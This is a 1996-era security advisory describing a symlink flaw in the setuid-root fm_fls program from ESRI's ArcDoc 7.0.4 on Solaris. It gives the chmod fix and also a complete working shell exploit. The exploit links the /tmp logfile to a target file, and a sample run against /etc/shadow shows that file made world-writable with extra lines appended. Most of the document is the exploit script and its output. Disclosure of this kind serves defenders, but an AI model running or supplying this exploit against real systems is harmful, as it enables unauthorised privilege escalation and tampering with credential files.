COMMAND

    fm_fls as distributed with ESRI's "ArcDoc" package (7.0.4)

SYSTEMS AFFECTED

    Any system that includes a setuid version of fm_fls is vulnerable.

PROBLEM

    The program "fm_fls" as  distributed with ESRI's "ArcDoc"  package
    (7.0.4)  contains  a  bug  which  allows  us  to  (a) add somewhat
    arbitrary data  to any  file and  (b) changes  the permissions  of
    that file to rw-rw-rw-.

    fm_fls is setuid root.

    When fm_fls  is executed,  it opens  up a  logfile --  the default
    location  for  this  file  is  /tmp/fm_fls.log.  Unfortunately, it
    doesn't check if this file already exists or if this file has  any
    symlinks  attached  to  it.   If  for  some reason fm_fls gets bad
    arguments,  it  will  write  these  bad  arguments to the logfile,
    chown the file to root, give the file 666 permissions, and exit.

    If we make  a link from  this file to  an unreadable file,  we can
    both append the contents of  the logfile into the unreadable  file
    and gain world rw access to the file.


    ------------------------------------------------------------------
    #!/bin/sh
    #
    #
    #
    # fix: chmod 555 `which fm_fls`
    #
    # tested on Solaris 2.5 w/ ArcDoc 7.0.4
    #

    # full path to the fm_fls executable

    FM_FLS="/nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls"

    LOGFILE=/tmp/fm_fls.log
    TMP=/tmp/exploit.$$
    UNREADABLE=$1


    if [ $# != 1 ]
    then
     echo "usage: `basename $0` filename"
     exit 1
    fi

    rm -f $LOGFILE

    if [ -f $LOGFILE ]
    then
     echo "tried to remove $LOGFILE, but it still exists!  Exploit won't work."
     exit 1
    fi

    # since fm_fls will complain if we link to a logfile too "far away"
    # from the original file, we just do a dual link..

    ln -s $UNREADABLE $TMP
    ln -s $TMP $LOGFILE

    $FM_FLS woot

    echo "`basename $0` of $UNREADABLE yields:"

    ls -l $UNREADABLE

    # all done, clean up.

    rm -f $TMP $LOGFILE
    exit 0
    ------------------------------------------------------------------

    Example :

    nowhere:> id
    uid=200(jwa) gid=107(cpin)

    nowhere:> ls -l /etc/shadow
    -rw-------   1 root     other       1851 May 23 20:22 /etc/shadow

    nowhere:> fm.sploit /etc/shadow
    /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls:
    Error.  Unable to open License File woot fm.sploit of /etc/shadow yields:
    -rw-rw-rw-   1 root     other       2011 May 23 20:38 /etc/shadow

    nowhere:> tail -5 /etc/shadow
    mpm:xxxxxxxxxxxxx:6445::::::
    ebp:xxxxxxxxxxxxx:6445::::::
    sml:xxxxxxxxxxxxx:6445::::::
    1996/05/23-20:38:32 BG woot nowhere
    # 1996/05/23-20:38:32 /nau/sun/packages/esri/fm_solaris2/bin/sunxm.s5.sparc/fm_fls:
    Error. Unable to open License File woot

    nowhere:~jwa/Security/Projects/r00tin>

    Note the  additional lines  appended to  the target  file (in this
    case, /etc/shadow.)

SOLUTION

    To fix  this, either  (a) yell  at your  vendor or  (b) chmod  555
    `which fm_fls`.